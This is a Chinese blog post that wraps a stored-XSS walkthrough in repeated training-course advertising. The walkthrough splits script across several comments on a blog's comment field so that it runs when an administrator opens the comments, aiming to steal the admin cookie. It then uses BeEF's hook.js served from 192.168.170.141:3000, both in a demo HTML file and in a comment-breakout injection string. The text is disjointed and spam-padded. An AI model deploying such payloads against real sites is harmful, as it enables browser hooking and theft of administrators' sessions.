一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
可以看到我们的数据成功插入了
那两个都入了且拼接了 ,之后我们再次执行,补充另外半个
之后管理员点击后台评论就可以实现自动弹窗了
我们通过三次拼接就可以达到插入最后弹窗如上
而重要的是alert并没有偷走我们管理员的cookie,现在我们需要思考的是如何偷管理员cookie????(我们可以使用img的方法)
在这里我们使用kill里面的beff软件,正常下载,看了一篇文章讲解的挺细致的
我上面花出的这三个网站的意思很重要!!!
Web界面管理控制台:http://127.0.0.1:3000/ui/panel(用于查看上钩的鱼儿以及对不同的目标进行管理操作)
shellcode探针:http://127.0.0.1:3000/hook.js,只要有人运行该文件,就会在管理控制台上线(上钩)。
测试网址:http://127.0.0.1:3000/demos/butcher/index.html,只要有人访问该网站,也会在管理控制台上线(上钩)。
接下来我们要用的就是hook.js这个文件
我们首先创建一个demo2.html这个文件来进行测试
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
</body>
<script>
var imgElement = document.createElement('img');
imgElement.style.display = 'none';
imgElement.src = "http://192.168.170.141:3000/hook.js"
document.body.appendChild(`imgElement`)
</script>
</html>
我们可以很清楚的看到是正常访问到了
那我们现在就要考虑在刚才的情况下我们如何盗取cookie,将我们刚才的HTML代码跟我们上面一样去评论区传入,数据库最终如下
再传一个闭合最终
我们去管理界面下看是否访问到hook.js
经过我多次尝试,刚才那种情况我们beef接收不到,img好像传递不了????但是确实是正常访问的
更改一下,可以重新抓包也可以数据库直接更新
"*/var scriptElemet = document.createElement('script');scriptElemet.src = 'http://192.168.170.141:3000/hook.js';document.body.appendChild(scriptElemet);/*"
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
